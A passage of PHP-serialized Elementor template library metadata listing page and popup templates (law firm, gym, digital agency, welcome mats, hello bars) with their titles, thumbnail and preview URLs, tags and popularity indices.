Sale\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2019/01/Fly-In_Register_small_01a.png\";s:12:\"tmpl_created\";i:1547007598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/fly-in-register_big-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:60;s:16:\"popularity_index\";i:689;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:535;a:14:{s:2:\"id\";i:1504;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app2.png\";s:12:\"tmpl_created\";i:1494352112;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:61;s:16:\"popularity_index\";i:162;s:11:\"trend_index\";i:222;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:536;a:14:{s:2:\"id\";i:12133;s:5:\"title\";s:24:\"Law Firm &#8211; Careers\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/11/careers.png\";s:12:\"tmpl_created\";i:1572847078;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-careers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:62;s:16:\"popularity_index\";i:562;s:11:\"trend_index\";i:377;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:537;a:14:{s:2:\"id\";i:10200;s:5:\"title\";s:33:\"Full Screen | Content Lock | Wine\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/lock_wine_small.png\";s:12:\"tmpl_created\";i:1548055635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/full-screen-content-lock/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:670;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:538;a:14:{s:2:\"id\";i:12155;s:5:\"title\";s:26:\"Law Firm &#8211; Home Page\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2019/11/home.png\";s:12:\"tmpl_created\";i:1572847054;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/law-firm-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:63;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:91;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:539;a:14:{s:2:\"id\";i:10287;s:5:\"title\";s:34:\"Full Screen | Register | Subscribe\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/glass_pink_small.png\";s:12:\"tmpl_created\";i:1547994301;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:551;s:11:\"trend_index\";i:570;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:540;a:14:{s:2:\"id\";i:12080;s:5:\"title\";s:24:\"Law Firm &#8211; Partner\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/11/partner-1.png\";s:12:\"tmpl_created\";i:1572847120;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-partner/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:64;s:16:\"popularity_index\";i:545;s:11:\"trend_index\";i:485;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:541;a:14:{s:2:\"id\";i:11074;s:5:\"title\";s:31:\"Digital Agency &#8211; Services\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2019/07/Services_small.png\";s:12:\"tmpl_created\";i:1564641872;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/digital-agency-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:65;s:16:\"popularity_index\";i:170;s:11:\"trend_index\";i:117;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:542;a:14:{s:2:\"id\";i:11506;s:5:\"title\";s:19:\"Gym &#8211; Classes\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Classes_Small.png\";s:12:\"tmpl_created\";i:1567392930;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-classes/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:517;s:11:\"trend_index\";i:392;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:543;a:14:{s:2:\"id\";i:9889;s:5:\"title\";s:28:\"Full Screen | Login | Cactus\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/cac_small.png\";s:12:\"tmpl_created\";i:1547838722;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/full-screen-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:66;s:16:\"popularity_index\";i:668;s:11:\"trend_index\";i:703;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:544;a:14:{s:2:\"id\";i:1503;s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app1.png\";s:12:\"tmpl_created\";i:1494352113;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:163;s:11:\"trend_index\";i:192;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:545;a:14:{s:2:\"id\";i:10077;s:5:\"title\";s:29:\"Fly In | Register | Subscribe\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2019/01/flyin_register_blue_small.png\";s:12:\"tmpl_created\";i:1547848197;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/fly-in-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:67;s:16:\"popularity_index\";i:499;s:11:\"trend_index\";i:546;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:546;a:14:{s:2:\"id\";i:12044;s:5:\"title\";s:24:\"Law Firm &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/11/contsct_us.png\";s:12:\"tmpl_created\";i:1572847130;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:442;s:11:\"trend_index\";i:242;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:547;a:14:{s:2:\"id\";i:10362;s:5:\"title\";s:32:\"Full Screen | Login | Restaurant\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/vip_small.png\";s:12:\"tmpl_created\";i:1548056253;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/full-screen-login-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:574;s:11:\"trend_index\";i:486;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:548;a:14:{s:2:\"id\";i:12124;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/11/services.png\";s:12:\"tmpl_created\";i:1572847096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/law-firm-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:427;s:11:\"trend_index\";i:415;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:549;a:14:{s:2:\"id\";i:11056;s:5:\"title\";s:35:\"Digital Agency &#8211; Social Media\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2019/07/Social-Media_small.png\";s:12:\"tmpl_created\";i:1564641867;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/digital-agency-social-media/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:296;s:11:\"trend_index\";i:342;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:550;a:14:{s:2:\"id\";i:10454;s:5:\"title\";s:29:\"Full Screen | Promotion | App\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/appy_small.png\";s:12:\"tmpl_created\";i:1548056896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/full-screen-promotion-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:693;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:551;a:14:{s:2:\"id\";i:11536;s:5:\"title\";s:19:\"Gym &#8211; Fitness\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Fitness_Small.png\";s:12:\"tmpl_created\";i:1567392927;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:490;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:552;a:14:{s:2:\"id\";i:11545;s:5:\"title\";s:21:\"Gym &#8211; Home Page\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Home_Small.png\";s:12:\"tmpl_created\";i:1567392943;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/gym-home-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:270;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:553;a:14:{s:2:\"id\";i:9803;s:5:\"title\";s:41:\"Full Screen | Register | Contact | Meetup\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2019/01/designme_full_small.png\";s:12:\"tmpl_created\";i:1547831298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/full-screen-register-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:629;s:11:\"trend_index\";i:640;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:554;a:14:{s:2:\"id\";i:10611;s:5:\"title\";s:18:\"Full Screen | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/fla_small.png\";s:12:\"tmpl_created\";i:1547968868;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/full-screen-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:700;s:11:\"trend_index\";i:696;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:555;a:14:{s:2:\"id\";i:12116;s:5:\"title\";s:24:\"Law Firm &#8211; Service\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/11/family_law.png\";s:12:\"tmpl_created\";i:1572847105;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/law-firm-service/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:475;s:11:\"trend_index\";i:371;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:556;a:14:{s:2:\"id\";i:11094;s:5:\"title\";s:30:\"Digital Agency &#8211; Clients\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/07/Clients_small.png\";s:12:\"tmpl_created\";i:1564641885;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/digital-agency-clients/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:401;s:11:\"trend_index\";i:363;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:557;a:14:{s:2:\"id\";i:10508;s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/hand_small-1.png\";s:12:\"tmpl_created\";i:1547964711;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/full-screen-welcome-mat-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:636;s:11:\"trend_index\";i:669;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:558;a:14:{s:2:\"id\";i:11478;s:5:\"title\";s:17:\"Gym &#8211; About\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/08/About_Small.png\";s:12:\"tmpl_created\";i:1567392939;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:99:\"https://library.elementor.com/gym-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:464;s:11:\"trend_index\";i:364;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:559;a:14:{s:2:\"id\";i:11563;s:5:\"title\";s:19:\"Gym &#8211; Pricing\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Pricing_Small.png\";s:12:\"tmpl_created\";i:1567392923;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-pricing/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:540;s:11:\"trend_index\";i:536;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:560;a:14:{s:2:\"id\";i:9934;s:5:\"title\";s:38:\"Full Screen | Welcome Mat | Teddy Bear\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/full_mat_teddy_small.png\";s:12:\"tmpl_created\";i:1547841787;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/full-screen-welcome-mat/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:606;s:11:\"trend_index\";i:618;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:561;a:14:{s:2:\"id\";i:11034;s:5:\"title\";s:30:\"Digital Agency &#8211; Contact\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/07/Contsct-Us_small.png\";s:12:\"tmpl_created\";i:1564641881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/contact-digital-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:30:\"[\"Digital Agency\",\"marketing\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:118;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:562;a:14:{s:2:\"id\";i:11528;s:5:\"title\";s:19:\"Gym &#8211; Contact\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/08/Contact_Small.png\";s:12:\"tmpl_created\";i:1567392917;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/gym-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:424;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:563;a:14:{s:2:\"id\";i:9709;s:5:\"title\";s:25:\"Full Screen | Welcome Mat\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2019/01/Full-Screen_Welcome-Mat_01_small-1.png\";s:12:\"tmpl_created\";i:1547023834;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/popups/full-screen-welcome-mat-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:650;s:11:\"trend_index\";i:700;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:564;a:14:{s:2:\"id\";i:519;s:5:\"title\";s:24:\"Homepage &#8211; Fitness\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0023.png\";s:12:\"tmpl_created\";i:1477388808;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/homepage-fitness/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Fitness\",\"Gym\",\"Health\",\"Homepage\",\"Sport\"]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:56;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:565;a:14:{s:2:\"id\";i:9671;s:5:\"title\";s:34:\"Hello Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2019/01/Top-Bar_Announcement_small_01.png\";s:12:\"tmpl_created\";i:1547010259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-announcement-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:79;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:642;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:566;a:14:{s:2:\"id\";i:487;s:5:\"title\";s:29:\"Landing Page &#8211; Vacation\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0021.png\";s:12:\"tmpl_created\";i:1477388357;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-vacation/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:25;s:11:\"trend_index\";i:124;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:567;a:14:{s:2:\"id\";i:10234;s:5:\"title\";s:38:\"Hello Bar | Announcement | Maintenance\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small.png\";s:12:\"tmpl_created\";i:1548055049;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/popups/hello-bar-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:80;s:16:\"popularity_index\";i:676;s:11:\"trend_index\";i:705;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:568;a:14:{s:2:\"id\";i:855;s:5:\"title\";s:37:\"Landing Page &#8211; Personal Trainer\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Personal-Trainer.png\";s:12:\"tmpl_created\";i:1494352061;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/landing-page-personal-trainer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:81;s:16:\"popularity_index\";i:263;s:11:\"trend_index\";i:390;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:569;a:14:{s:2:\"id\";i:955;s:5:\"title\";s:31:\"Landing Page &#8211; Law Office\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Law-Office.png\";s:12:\"tmpl_created\";i:1494352069;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-law-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:31:\"[\"Landing Page\",\"Law\",\"Office\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:173;s:11:\"trend_index\";i:259;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:570;a:14:{s:2:\"id\";i:9373;s:5:\"title\";s:33:\"Landing Page &#8211; Conference 5\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/11/conference-250.png\";s:12:\"tmpl_created\";i:1542811219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:254;s:11:\"trend_index\";i:321;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:571;a:14:{s:2:\"id\";i:9869;s:5:\"title\";s:28:\"Hello Bar | Promotion | Sale\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/01/ru_small.png\";s:12:\"tmpl_created\";i:1547837269;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/popups/hello-bar-promotion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:686;s:11:\"trend_index\";i:0;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:572;a:14:{s:2:\"id\";i:974;s:5:\"title\";s:28:\"Landing Page &#8211; Stylist\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/03/Landing-Page-Stylist.png\";s:12:\"tmpl_created\";i:1494352071;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-stylist/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"cosmetics\",\"fashion\",\"girly\",\"hairdresser\",\"lifestyle\",\"makeup\",\"manicure\",\"pedicure\",\"products\",\"salon\",\"Shop\",\"skincare\",\"stylist\",\"wellness\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:301;s:11:\"trend_index\";i:447;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:573;a:14:{s:2:\"id\";i:10539;s:5:\"title\";s:19:\"Hello Bar | Contact\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/hello_pink_small.png\";s:12:\"tmpl_created\";i:1548056994;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/hello-bar-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:622;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:574;a:14:{s:2:\"id\";i:11948;s:5:\"title\";s:18:\"Maintenance Mode 3\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/10/mm3.png\";s:12:\"tmpl_created\";i:1572153978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/maintenance-mode-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"Maintenance 